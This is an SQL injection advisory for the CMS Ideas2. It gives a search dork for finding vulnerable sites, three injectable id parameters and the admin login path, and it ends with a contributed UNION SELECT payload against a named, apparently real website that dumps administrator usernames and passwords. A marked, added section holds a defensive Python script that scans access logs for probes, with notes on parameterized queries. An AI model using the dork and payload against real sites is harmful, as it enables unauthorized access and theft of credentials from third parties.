CMS IDEAS2 - SQL INJECTION

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* SQL Injection
* Author: Mont
* www.argentinasecurity.com.ar
* Developer: http://ideas2.com.ar (I think)
* Dork: allinurl:"seccion_detalle.php?idseccion="

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* SQL Injection


PoC :
http://www.WEBVICTIMA.com/[path_vulnerable]='

Login:
http://www.WEBVICTIMA.com/admin
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Vulnerable Paths



producto_categoria.php?idcategoria=

seccion_detalle.php?idseccion=

seccion_categoria.php?idcategoria=
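
Added example (not part of the original advisory and not code from the CMS): a log check an operator of this CMS can run to find requests to the three scripts above whose id parameter is not a plain integer. It assumes the ids are numeric and that the web server writes common/combined access-log lines; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> id parameter, taken from the advisory's list of vulnerable paths.
VULNERABLE = {
    "producto_categoria.php": "idcategoria",
    "seccion_detalle.php": "idseccion",
    "seccion_categoria.php": "idcategoria",
}

# Client address and request target of a common/combined access-log entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_requests(lines):
    """Return (client, script, decoded_value) for every request to a listed
    script whose id parameter is anything other than a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        script = url.path.rsplit("/", 1)[-1].lower()
        param = VULNERABLE.get(script)
        if param is None:
            continue
        # keep_blank_values so an empty "idseccion=" is reported too
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not re.fullmatch(r"\d+", value):
                hits.append((client, script, value))
    return hits

# Constructed sample log lines (documentation IP ranges, no real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /seccion_detalle.php?idseccion=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /seccion_detalle.php?idseccion=%27 HTTP/1.1" 500 310',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /producto_categoria.php?idcategoria=-1+UNION+SELECT+1,2 HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /contacto.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, script, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} {script} {value!r}")
```

The same integer-only rule, enforced in the PHP scripts before the value reaches the query and combined with parameterized queries, is the fix for the flaw itself; the log check only shows who has been probing.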


[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Greetz:


n3xtdoor, MenteCriminal, rodr1, Em3trix, Bacan!, and #Inyexion

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Example contributed by MenteCriminal


http://www.piazzollatangoshow.com/seccion_detalle.php?idseccion=-1+UNION+SELECT+1,2,
3,4,5,concat_ws(0x3a,iduser_admin_login,usuario,password),7,8+
from+user_admin--

ideas2 : pato

--------------